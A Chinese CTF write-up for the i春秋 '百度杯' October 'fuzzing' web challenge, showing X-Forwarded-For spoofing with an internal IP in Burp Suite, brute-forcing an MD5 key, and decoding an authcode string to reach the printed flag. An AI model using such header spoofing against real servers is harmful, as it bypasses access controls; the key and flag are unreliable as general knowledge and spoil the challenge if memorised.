i春秋, “百度杯”CTF比赛 十月场, Web, fuzzing
分值：50分
类型：Web
题目名称：fuzzing
题目内容：there is noting
--------------------------------------------------
打开网页，显示 there is nothing
使用 Burp Suite，
Proxy, Action, Send to Repeater
Repeater, 点击 Send 按钮
在 Response 的 Headers 中看到：
hint: ip,Large internal network
应该是要构造 ip，使用 X-Forwarded-For，它要大的内部网络，
常用内网 IP 段：192.168.0.0, 172.16.0.0, 10.0.0.0
在 Request Headers 中 Add:
X-Forwarded-For: 10.0.0.0
再次 Send，在 Response 的 Headers 中看到：
Location: ./m4nage.php
把 Request 的第1行
GET /Challenges/test.php HTTP/1.1  改为
GET /Challenges/m4nage.php HTTP/1.1
再次 Send，在 Response 的 Body 中看到：
show me your key
在 Body Parametes 中 Add：
key=123456
把 Request 的第1行改为:
POST /Challenges/m4nage.php HTTP/1.1
再次 Send，在 Response 的 Body 中看到：
key is not right,md5(key)==="1b4167610ba3f2ac426a68488dbd89be",and the key is ichunqiu***,the * is in [a-z0-9]
写个 Python 程序暴力计算 md5，得到：
$ python a.py
ichunqiu105
把 key=123456 改为 key=ichunqiu105
再次 Send，在 Response 的 Body 中看到：
the next step: xx00xxoo.php
把 Request 的第1行改为:
POST /Challenges/xx00xxoo.php HTTP/1.1
再次 Send，在 Response 的 Body 中看到：
source code is in the x0.txt.Can you guess the key
the authcode(flag) is 26fftQeQ0eOFzmTG/Tfk73RKigeTJ7heunRWiL3DHFi0BatsuSHLanUhaAJcGbeAApmmrJy5oC1O4DLO/7zx/uBKPkVb9Mk
把 Request 的第1行改为:
POST /Challenges/x0.txt HTTP/1.1
再次 Send，在 Response 的 Body 中看到一个很复杂的函数：
function authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {
...
}
把这个函数复制到 a.php 中，在最前增加
<?php
在最后增加（注意，第1个参数要使用刚刚得到的字符串，key 使用前面暴力计算出来的）：
echo authcode('26f...9Mk',$operation = 'DECODE', $key = 'ichunqiu105', $expiry = 0);
?>
运行之，得到:
$ php a.php; echo
flag{c479e079-781c-4e91-bf0d-b12a57ea2ec2}
关闭 Firefox 浏览器的代理，提交答案，正确！

见：https://www.jianshu.com/p/15bfc6143334
